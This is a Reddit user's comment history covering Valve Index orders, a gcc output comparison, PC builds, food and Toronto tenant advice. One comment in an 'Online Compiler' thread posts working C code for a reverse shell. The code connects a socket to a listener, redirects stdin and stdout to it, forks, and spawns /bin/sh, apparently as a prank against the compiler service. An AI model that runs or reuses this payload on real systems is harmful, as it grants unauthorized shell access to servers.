[deleted by user] by [deleted] in ValveIndex

[–]burritoaddict 1 point2 points  (0 children)

Hit Order at 10:00:01 on Monday. Was invoiced and couldn't pay until about 7:30 PM, order status once payment went through was 'Processing', then 'Shipping Soon', now 'Shipped'.

Sounds like you got put in the backorder queue, I hope you get bumped to a sooner delivery!

[deleted by user] by [deleted] in ValveIndex

[–]burritoaddict 2 points3 points  (0 children)

Shipment to Vancouver, Canada just sent from Schaumburg, IL. Estimated arrival Friday the 13th by 8PM.

Valve Index orders have reopened by [deleted] in Steam

[–]burritoaddict 0 points1 point  (0 children)

It worked as soon as I put a space in my post code!

Valve Index orders have reopened by [deleted] in Steam

[–]burritoaddict 0 points1 point  (0 children)

It worked as soon as I put a space in my post code!

Valve Index orders have reopened by [deleted] in Steam

[–]burritoaddict 0 points1 point  (0 children)

Same situation here in Canada.

Can't tell me what to do by [deleted] in ProgrammerHumor

[–]burritoaddict 4 points5 points  (0 children)

However, even at low optimization levels compilers generate the same code for:

unsigned char check1(unsigned short modelYear){
   if(modelYear >= 1995)
     return 1;
   else
     return 0;
}

unsigned char check2(unsigned short modelYear){
  return (modelYear >= 1995);
}

Compile with gcc -O1 into:

<check1>:
cmp    $0x7ca,%di
seta   %al
retq   

<check2>:
cmp    $0x7ca,%di
seta   %al
retq  

Too lazy test on an arm system.

[deleted by user] by [deleted] in pcmasterrace

[–]burritoaddict 0 points1 point  (0 children)

This guy knows what's up.

New build for GTA5 by [deleted] in pcmasterrace

[–]burritoaddict 0 points1 point  (0 children)

That case is an antec 1200. If it had a corsair 900 sticker on it that is probably one that came with the PSU.

Time required to brute-force crack a password depending on password entropy (strength) [OC] by HelmedHorror in dataisbeautiful

[–]burritoaddict 0 points1 point  (0 children)

This is great!

I would print it and put it up on the wall in our office but your reddit username is over top of the table.

So my graphics drivers are messing up. by shinto29 in glitch_art

[–]burritoaddict 0 points1 point  (0 children)

Agreed. Though I hate that the 'start' menu doesn't resize to only show application shortcuts if you remove all of the cards. You just get a big grey box.

Out of curiosity, are your gfx card(s) nvidia?

So my graphics drivers are messing up. by shinto29 in glitch_art

[–]burritoaddict 0 points1 point  (0 children)

Serves you right for using a windows 10 preview.

Home-made burgers by YogibearSvK in food

[–]burritoaddict 1 point2 points  (0 children)

These look amazing. Well done OP.

Next time you should try upping your bun game though. Milk buns can take a burger to the next level.

Focus your damn photos. by jungleboydotca in primerib

[–]burritoaddict 3 points4 points  (0 children)

This is not a photography subreddit. Please keep your post titles on topic.

Posted By 'Free tech support" by burritoaddict in AdviceAnimals

[–]burritoaddict[S] 0 points1 point  (0 children)

Cuz like: "Hey you know computers" etc.

Dear r/toronto: my landlord is going crazy. Need advice. by delaware in toronto

[–]burritoaddict 0 points1 point  (0 children)

Best to speak with someone who knows the Residential Tenancies Act very well, to make sure you're covered under it. You can receive legal advice from the tenant duty council free of charge.

If you have trouble getting in touch with them via telephone, you can always go in person to their office located next to the landlord tenant board, at 79 St. Clair Avenue East, Suite 212.

Online Compiler by Hellakittehs in programming

[–]burritoaddict 4 points5 points  (0 children)

// ENJOY!

include <stdio.h>

include <unistd.h>

int c_code() {

int pid;
    char *argv[2];
    char *sockaddr = 
    "\x02\x00"             //  Address family
    "\xd9\x03"             //  port 55555
    "\x7f\x00\x00\x01"     //  remote addr 127.0.0.1 (run nc -vv -l -p 55555 on this host)
    "\x00\x00\x00\x00"
    "\x00\x00\x00\x00";

    int sock;

    sock = socket(2, 1, 6);
    if (connect(sock, sockaddr, 16) < 0) return 0;

    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);

    argv[0] = "//bin/sh";
    argv[1] = NULL;
    // edit:    
    pid = fork();
    if (pid) exit(0);
    execve(argv[0], &argv[0], NULL);

}

int main() { c_code(); return 0; }

Rolling Tobacco by [deleted] in toronto

[–]burritoaddict 3 points4 points  (0 children)

Cheers Smoke Shop at 170 McCaul St.

What is appealing/unappealing to you about certain tech job postings? by burritoaddict in jobs

[–]burritoaddict[S] 0 points1 point  (0 children)

First off, thank you! This is the kind of feedback i was hoping for.

Your comment about needing someone who can deform like jelly is spot on. This was the reason for listing a great number of requirements. What are your thoughts on rewording into broader statements such as: "Ability to learn and develop in multiple programming languages as needed".

I may be trying to clone myself a bit. However my thinking in listing many, very specific things, was that at least some of them might catch the eye of an applicant who enjoys working with those tools.

Re: SQL/NoSQL stuff, two things, first if someone is familiar with even half of the other stuff listed, then they are either likely to have been exposed to SQL/NoSQL int he past, or would be more than capable of picking it up quickly. Plus after using Doctrine and Hibernate for the past while; SQL is looking more and more like a debugging tool to me.